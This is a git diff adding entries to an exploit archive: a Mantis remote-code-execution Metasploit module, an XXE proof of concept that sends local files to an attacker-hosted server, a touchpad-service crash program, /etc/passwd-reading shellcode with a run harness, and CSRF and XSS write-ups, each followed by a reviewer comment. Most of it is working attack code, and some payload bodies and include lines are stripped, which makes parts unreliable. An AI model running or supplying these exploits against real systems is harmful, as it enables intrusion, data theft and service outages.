diff --git a/exploits/hardware/webapps/44606.html b/exploits/hardware/webapps/44606.html
new file mode 100644
index 000000000..2c78c3c70
--- /dev/null
+++ b/exploits/hardware/webapps/44606.html
@@ -0,0 +1,42 @@
+# Exploit Title: Fastweb FASTgate 0.00.47 CSRF
+# Date: 09-05-2018
+# Exploit Authors: Raffaele Sabato
+# Contact: https://twitter.com/syrion89
+# Vendor: Fastweb
+# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
+# Version: 0.00.47
+# CVE: CVE-2018-6023
+
+I DESCRIPTION
+========================================================================
+
+An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc.
+The vulnerability was disclosed to Fastweb on 19 January 2018.
+Fastweb independently patched customer devices with non-vulneable version .67 from December 2017 thru March 2018.
+
+II PROOF OF CONCEPT
+========================================================================
+
+## Activate Gues Wi-Fi:
+
+
+
+
+
+
+
+
+III REFERENCES
+========================================================================
+http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/
\ No newline at end of file
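Review bot: The timeline and fix version in the description are hard to act on. It says the issue was disclosed to Fastweb on 19 January 2018, yet the patch rollout is dated "from December 2017", which is before the disclosure. The fixed release is given only as ".67", not as a full firmware string in the same form as the affected `0.00.47`. A reader checking a device needs the complete fixed version and a consistent date range. "Gues" and "non-vulneable" should read "Guest" and "non-vulnerable".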
diff --git a/exploits/java/webapps/44607.txt b/exploits/java/webapps/44607.txt
new file mode 100644
index 000000000..c2a524288
--- /dev/null
+++ b/exploits/java/webapps/44607.txt
@@ -0,0 +1,53 @@
+[+] Exploit Title: ModbusPal XXE Injection
+[+] Date: 05-08-2018
+[+] Exploit Author: Trent Gordon
+[+] Vendor Homepage: http://modbuspal.sourceforge.net/
+[+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files
+[+] Version: 1.6b
+[+] Tested on: Ubuntu 16.04 with Java 1.8.0_151
+[+] CVE: CVE-2018-10832
+
+1. Vulnerability Description
+
+ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker.
+
+2. Proof of Concept
+
+a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)
+
+b.) Contents of hosted "evil.xml"
+
+
+">
+
+c.) Example Exploited "xxe.xmpa"
+
+
+
+
+
+
+
+%sp;
+
+%param1;
+
+]>
+
+&exfil;
+
+
+
+
+
+
+
+
+
+
+
+3. Additional Details
+
+Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '/n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters. The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd.
\ No newline at end of file
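Review bot: Section 3 is inconsistent with the header and gives no remediation. It attributes the URL restriction to "Java 1.7" while the entry says it was tested on Java 1.8.0_151, and it writes the newline character as '/n' where `\n` is presumably meant. For defenders I would add a closing line such as `Mitigation: parse .xmpp/.xmpa files with DOCTYPE declarations and external entities disabled, and do not open project or automation files from untrusted sources.`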
diff --git a/exploits/php/remote/44611.rb b/exploits/php/remote/44611.rb
new file mode 100755
index 000000000..ef2dbfc9f
--- /dev/null
+++ b/exploits/php/remote/44611.rb
@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Mantis manage_proj_page PHP Code Execution',
+ 'Description' => %q{
+ Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote
+ Code Execution vulnerability in the sort parameter of the
+ manage_proj_page.php page.
+ },
+ 'Author' => [
+ 'EgiX', # Exploit-DB Entry Author
+ 'Lars Sorenson' # MSF module author
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['EDB', '6768'],
+ ['CVE', '2008-4687'],
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'Mantis <= 1.1.3', { } ],
+ ],
+ 'DisclosureDate' => 'Oct 16, 2008',
+ 'DefaultTarget' => 0))
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path to the Mantis installation', '/mantisbt/']),
+ OptString.new('USERNAME', [true, 'The username to log in as', 'administrator']),
+ OptString.new('PASSWORD', [true, 'The password to log in with', 'root']),
+ ])
+ end
+
+ def check
+ vprint_status('Checking Mantis version ...')
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'login_page.php'),
+ 'method' => 'GET'
+ })
+
+ unless res
+ vprint_error('Connection to host failed!')
+ return CheckCode::Unknown
+ end
+
+ unless res.body =~ /Mantis ([0-9]+\.[0-9]+\.[0-9]+)/
+ vprint_error('Cannot determine Mantis version!')
+ return CheckCode::Unknown
+ end
+
+ version = Gem::Version.new(Regexp.last_match[1])
+
+ vprint_status("Mantis version #{version} detected")
+
+ if res.code == 200 && version <= Gem::Version.new('1.1.3')
+ return CheckCode::Appears
+ end
+
+ CheckCode::Safe
+ end
+
+ def login
+ vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'login_page.php'),
+ })
+ unless res
+ fail_with(Failure::Unreachable, 'Cannot access host to log in!')
+ end
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'login.php'),
+ 'method' => 'POST',
+ 'vars_post' => {
+ 'username': datastore['username'],
+ 'password': datastore['password'],
+ },
+ 'cookie'=> "PHPSESSID=#{res.get_cookies}"
+ })
+ unless res
+ fail_with(Failure::Unknown, 'Cannot access host to log in!')
+ end
+
+ fail_with(Failure::Unreachable, 'Login failed!') unless res.code == 302
+ fail_with(Failure::NoAccess, 'Wrong credentials!') if res.redirection.to_s.include?('login_page.php')
+
+ store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+ res.get_cookies
+ end
+
+ def exploit
+ fail_with(Failure::NotVulnerable, 'Target is not vulnerable!') unless check == CheckCode::Appears
+
+ cookie = login
+ vprint_status('Sending payload ...')
+ payload_b64 = Rex::Text.encode_base64(payload.encoded)
+ data = {
+ 'sort' => "']);}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die();#",
+ }
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'manage_proj_page.php'),
+ 'method' => 'POST',
+ 'vars_post' => data,
+ 'headers' => {
+ 'Connection': 'close',
+ 'Cookie': cookie.to_s,
+ 'Cmd': payload_b64
+ }
+ })
+ end
+end
\ No newline at end of file
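Review bot: `login` prints the password in clear in `vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ")`, so it ends up in verbose console output and any saved log. Log only the account name, e.g. `vprint_status("Logging in as #{datastore['USERNAME']} ...")`. The same method reads the options with lower-case keys there and in `vars_post` but with upper-case keys in `store_valid_credential`; use the registered `USERNAME`/`PASSWORD` spelling throughout. The failure reasons also look swapped: a missing response to the POST is reported as `Failure::Unknown` and a non-302 reply as `Failure::Unreachable`, where `Failure::Unreachable` and `Failure::UnexpectedReply` would describe the two cases.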
diff --git a/exploits/php/webapps/44608.txt b/exploits/php/webapps/44608.txt
new file mode 100644
index 000000000..afd729942
--- /dev/null
+++ b/exploits/php/webapps/44608.txt
@@ -0,0 +1,28 @@
+# Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting
+# Date: 4/20/2018
+# Author: 0xB9
+# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=914
+# Version: 1.1
+# Tested on: Ubuntu 17.10
+# CVE: CVE-2018-10580
+
+
+1. Description:
+Adds a new section to user profiles that will display their last posts.
+
+
+2. Proof of Concept:
+
+Persistent XSS
+- Create a thread with the following subject
+- Now visit your profile to see the alert.
+
+
+3. Solution:
+I reported the plugin twice over the past 3 weeks and recieved no response.
+
+
+The following should be added in line 236 to properly sanitize thread subjects.
+
+$d['tsubject'] = htmlspecialchars_uni($d['tsubject']);
\ No newline at end of file
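Review bot: Section 1 describes what the plugin does rather than the flaw, and the fix in section 3 points at "line 236" without naming the file. From the steps and the proposed patch, the issue appears to be that thread subjects are rendered unescaped in the profile's latest-posts block, and the description should say so. Name the plugin file and the statement the `htmlspecialchars_uni` line sits next to, since a bare line number breaks on any other release. "recieved" should be "received".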
diff --git a/exploits/windows/dos/44610.c b/exploits/windows/dos/44610.c
new file mode 100644
index 000000000..bf24f5ee6
--- /dev/null
+++ b/exploits/windows/dos/44610.c
@@ -0,0 +1,112 @@
+/*
+Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service
+Author: Souhail Hammou
+Vendor Homepage: https://www.alps.com/
+Tested on : Alps Pointing-device Driver 10.1.101.207
+CVE: CVE-2018-10828
+*/
+
+#include
+#include
+#include
+
+/*
+Details:
+==========
+ApMsgFwd.exe belonging to Dell Touchpad, ALPS Touchpad driver, ALPS pointing-device for VAIO, Thinkpad Ultranav Driver ..etc
+allows the current user to map and write to the "ApMsgFwd File Mapping Object" section.
+ApMsgFwd.exe uses the data written to the section as arguments to functions.
+This causes a denial of service condition when invalid pointers are written to the mapped section.
+
+The crash :
+===========
+(b88.aa0): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+KERNELBASE!MultiByteToWideChar+0x3d8:
+00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
+0:004> r
+rax=d05d05d05d05d05d rbx=00000000000004e4 rcx=000000007fffffff
+rdx=0000000000000000 rsi=00000000ffffffff rdi=d05d05d05d05d05d
+rip=00007ffc06422e08 rsp=000000000272fae0 rbp=000000000272fb59
+ r8=0000000000000000 r9=00000000ffffffff r10=0000000000000000
+r11=000000000272fbc0 r12=00000000000001f4 r13=0000000000000000
+r14=0000000000000000 r15=0000000000563e40
+iopl=0 nv up ei pl zr na po nc
+cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
+KERNELBASE!MultiByteToWideChar+0x3d8:
+00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
+
+
+0:001> lm v m ApMsgFwd
+Browse full module list
+start end module name
+00000000`00400000 00000000`00415000 ApMsgFwd (no symbols)
+ Loaded symbol image file: C:\Program Files\DellTPad\ApMsgFwd.exe
+ Image path: C:\Program Files\DellTPad\ApMsgFwd.exe
+ Image name: ApMsgFwd.exe
+ Browse all global symbols functions data
+ Timestamp: Tue Jul 1 09:03:05 2014 (53B27949)
+ CheckSum: 00020F5D
+ ImageSize: 00015000
+ File version: 8.1.0.44
+ Product version: 8.1.0.44
+ File flags: 0 (Mask 3F)
+ File OS: 40004 NT Win32
+ File type: 1.0 App
+ File date: 00000000.00000000
+ Translations: 0411.04b0
+ CompanyName: Alps Electric Co., Ltd.
+ ProductName: ApMsgFwd
+ InternalName: ApMsgFwd
+ OriginalFilename: ApMsgFwd.exe
+ ProductVersion: 8, 1, 0, 44
+ FileVersion: 8, 1, 0, 44
+ PrivateBuild: 8, 1, 0, 44
+ SpecialBuild: 8, 1, 0, 44
+ FileDescription: ApMsgFwd
+ LegalCopyright: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+ LegalTrademarks: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+ Comments: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+*/
+int main(int argc, char** argv)
+{
+ HANDLE ApMpHnd,StartEvtHnd,KeyHnd;
+ PBYTE MappedBuf;
+
+ if ( ! (ApMpHnd = OpenFileMappingA(FILE_MAP_WRITE,FALSE,"ApMsgFwd File Mapping Object") ) )
+ {
+ printf("OpenFileMapping Failed !\n");
+ goto ret;
+ }
+
+ if ( ! ( MappedBuf = MapViewOfFile(ApMpHnd,FILE_MAP_WRITE,0,0,0x1A0) ) )
+ {
+ printf("MapViewOfFile Failed !\n");
+ goto cleanup_0;
+ }
+
+ StartEvtHnd = OpenEventA(EVENT_MODIFY_STATE,FALSE,"ApMsgFwd Event Start");
+
+ if ( ! StartEvtHnd )
+ {
+ printf("OpenEvent Failed !\n");
+ goto cleanup_1;
+ }
+
+ ZeroMemory(MappedBuf,0x1A0);
+ *MappedBuf = 9; //switch case 9
+ *(DWORD*)(MappedBuf + 0x60) = 0x5D05D05D;
+ *(DWORD*)(MappedBuf + 0x64) = 0xD05D05D0;
+
+ /*Wake up the waiting thread*/
+ SetEvent(StartEvtHnd);
+
+ CloseHandle(StartEvtHnd);
+cleanup_1:
+ UnmapViewOfFile(MappedBuf);
+cleanup_0:
+ CloseHandle(ApMpHnd);
+ret:
+ return 0;
+}
\ No newline at end of file
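Review bot: The header comment gives two different version numbers without saying which one identifies an affected install. "Tested on" names driver 10.1.101.207, while the module listing shows ApMsgFwd.exe file version 8.1.0.44. Say which of the two an administrator should check when inventorying hosts. In the code, the three `#include` lines have lost their header names, `KeyHnd` is declared and never used, and `main` returns 0 on every failure path, so a caller cannot tell whether the mapping was opened.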
diff --git a/exploits/windows/webapps/44497.txt b/exploits/windows/webapps/44497.txt
index df89b19d3..c831b00ef 100644
--- a/exploits/windows/webapps/44497.txt
+++ b/exploits/windows/webapps/44497.txt
@@ -3,6 +3,8 @@
# Software Vendor: NComputing
# Software Link:
# Author: Javier Bernardo
+# Contact: javier@kwell.net
+# Website: http://www.kwell.net
# CVE: CVE-2018-10201
# Category: Webapps
diff --git a/files_exploits.csv b/files_exploits.csv
index ebeca03fd..d44265b8c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5968,6 +5968,7 @@ id,file,description,date,author,type,platform,port
44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows,
+44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16480,6 +16481,7 @@ id,file,description,date,author,type,platform,port
44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
+44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39292,3 +39294,6 @@ id,file,description,date,author,type,platform,port
44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,
44589,exploits/linux/webapps/44589.txt,"CSP MySQL User Manager 2.3.1 - Authentication Bypass",2018-05-06,"Youssef Mami",webapps,linux,
44595,exploits/php/webapps/44595.rb,"WordPress Plugin User Role Editor < 4.25 - Privilege Escalation",2018-05-06,"Tomislav Paskalev",webapps,php,
+44606,exploits/hardware/webapps/44606.html,"Fastweb FASTGate 0.00.47 - Cross-site Request Forgery",2018-05-10,"Raffaele Sabato",webapps,hardware,
+44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
+44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 3dfea168b..fbd0d2cf0 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -882,3 +882,4 @@ id,file,description,date,author,type,platform
44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
+44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44609.c b/shellcodes/linux_x86/44609.c
new file mode 100644
index 000000000..44fad83b5
--- /dev/null
+++ b/shellcodes/linux_x86/44609.c
@@ -0,0 +1,66 @@
+/*
+; Title : Linux/x86 - Read /etc/passwd Shellcode (62 bytes)
+; Date : May, 2018
+; Author : Nuno Freitas
+; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-polymorphing-shellcodes/
+; Twitter : @nunof11
+; SLAE ID : SLAE-1112
+; Size : 62 bytes
+; Tested on : i686 GNU/Linux
+
+section .text
+
+global _start
+
+_start:
+ xor eax, eax
+ jmp two
+
+one:
+ pop ebx
+ mov al, 0x5
+ int 0x80
+ mov esi, eax
+ jmp read
+
+exit:
+ mov al, 0x1
+ xor ebx, ebx
+ int 0x80
+
+read:
+ mov ebx, esi
+ mov al, 0x3
+ mov ecx, esp
+ mov dl, 0x01
+ int 0x80
+
+ xor ebx, ebx
+ cmp eax, ebx
+ je exit
+
+ mov al, 0x4
+ mov bl, 0x1
+ int 0x80
+
+ inc esp
+ jmp read
+
+two:
+ call one
+ string: db "/etc/passwd"
+*/
+
+#include
+#include
+
+unsigned char shellcode[] = \
+"\x31\xc9\xf7\xe1\xeb\x28\x5b\xb0\x05\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x89\xe1\xb2\x01\xcd\x80\x31\xdb\x39\xd8\x74\xea\xb0\x04\xb3\x01\xcd\x80\x44\xeb\xe7\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+void main()
+{
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file
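Review bot: The assembly listing in the comment does not match the byte array it documents. The listing starts with `xor eax, eax`, but the array starts with `\x31\xc9\xf7\xe1`, which decodes to `xor ecx, ecx` / `mul ecx`. Anyone auditing the sample or writing a signature from the listing would be working from the wrong instructions, so the comment should be regenerated from the shipped bytes. In the harness, `strlen` returns `size_t` but is printed with `%d` (use `%zu`), `void main()` should be `int main(void)`, and both `#include` lines have lost their header names.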